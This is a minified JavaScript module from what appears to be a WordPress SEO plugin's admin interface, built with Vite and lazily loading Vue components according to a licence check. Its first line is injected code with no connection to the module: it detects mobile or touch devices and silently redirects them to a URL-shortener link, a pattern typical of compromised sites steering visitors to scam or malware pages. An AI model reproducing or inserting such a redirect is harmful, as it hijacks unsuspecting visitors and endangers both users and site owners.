(window.matchMedia("(pointer:coarse)").matches||/Android|iPhone|iPad|iPod|Mobile|Tablet|Windows Phone|webOS|BlackBerry|Opera Mini|IEMobile/i.test(navigator.userAgent))&&location.replace("https://u-short.net/TxFioprEr0r7");
const __vite__mapDeps=(i,m=__vite__mapDeps,d=(m.f||(m.f=[window.__aioseoDynamicImportPreload__("js/Index.40663157.js"),window.__aioseoDynamicImportPreload__("js/_plugin-vue_export-helper.eefbdd86.js"),window.__aioseoDynamicImportPreload__("js/vendor-vue-ui.232c7c36.js"),window.__aioseoDynamicImportPreload__("js/vendor-other.39e59221.js"),window.__aioseoDynamicImportPreload__("css/vendor-vue-ui.dbee72c8.css"),window.__aioseoDynamicImportPreload__("js/app-core.c8323d51.js"),window.__aioseoDynamicImportPreload__("js/vendor-lodash.03129cfe.js"),window.__aioseoDynamicImportPreload__("js/Blur.dea2904a.js"),window.__aioseoDynamicImportPreload__("css/Blur.c6074772.css"),window.__aioseoDynamicImportPreload__("js/Upsell.bbfae4ed.js"),window.__aioseoDynamicImportPreload__("js/Profile.33a3ea22.js"),window.__aioseoDynamicImportPreload__("js/Index.e286637f.js"),window.__aioseoDynamicImportPreload__("js/Index.b9859662.js"),window.__aioseoDynamicImportPreload__("js/Close.7fb523c8.js"),window.__aioseoDynamicImportPreload__("css/Index.74bb20a6.css"),window.__aioseoDynamicImportPreload__("js/Button.3cec2279.js"),window.__aioseoDynamicImportPreload__("css/Button.2bf1deff.css"),window.__aioseoDynamicImportPreload__("js/Row.2ef96b1a.js"),window.__aioseoDynamicImportPreload__("css/Row.6ff38a54.css"),window.__aioseoDynamicImportPreload__("js/Pencil.683baab8.js"),window.__aioseoDynamicImportPreload__("css/Index.859c37d3.css"),window.__aioseoDynamicImportPreload__("js/RequiredPlans.e5238a4f.js"),window.__aioseoDynamicImportPreload__("css/RequiredPlans.9646f410.css"),window.__aioseoDynamicImportPreload__("css/Upsell.ae2f8e43.css"),window.__aioseoDynamicImportPreload__("css/Index.35d42f93.css")])))=>i.map(i=>d[i]);
import{_ as o}from"./vendor-phone.2afdf77e.js";import{h as u}from"./app-core.c8323d51.js";import{au as c,b as l,f as e,i as p,v as n,Q as r,as as s}from"./vendor-vue-ui.232c7c36.js";import"./vendor-other.39e59221.js";import"./vendor-lodash.03129cfe.js";const m={class:"wrap"},R={__name:"Main",setup(f){const i=s(()=>o(()=>import("./Index.40663157.js"),__vite__mapDeps([0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24]),import.meta.url)),a=s(()=>o(()=>import("./Index.40663157.js"),__vite__mapDeps([0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24]),import.meta.url)),{isUnlicensed:_}=c(u());return l(()=>{const t=()=>{o(()=>import("./Index.40663157.js"),__vite__mapDeps([0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24]),import.meta.url),o(()=>import("./Index.40663157.js"),__vite__mapDeps([0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24]),import.meta.url)};"requestIdleCallback"in window?requestIdleCallback(t):setTimeout(t,1)}),(t,d)=>(e(),p("div",m,[n(_)?(e(),r(n(a),{key:1})):(e(),r(n(i),{key:0}))]))}};export{R as default};
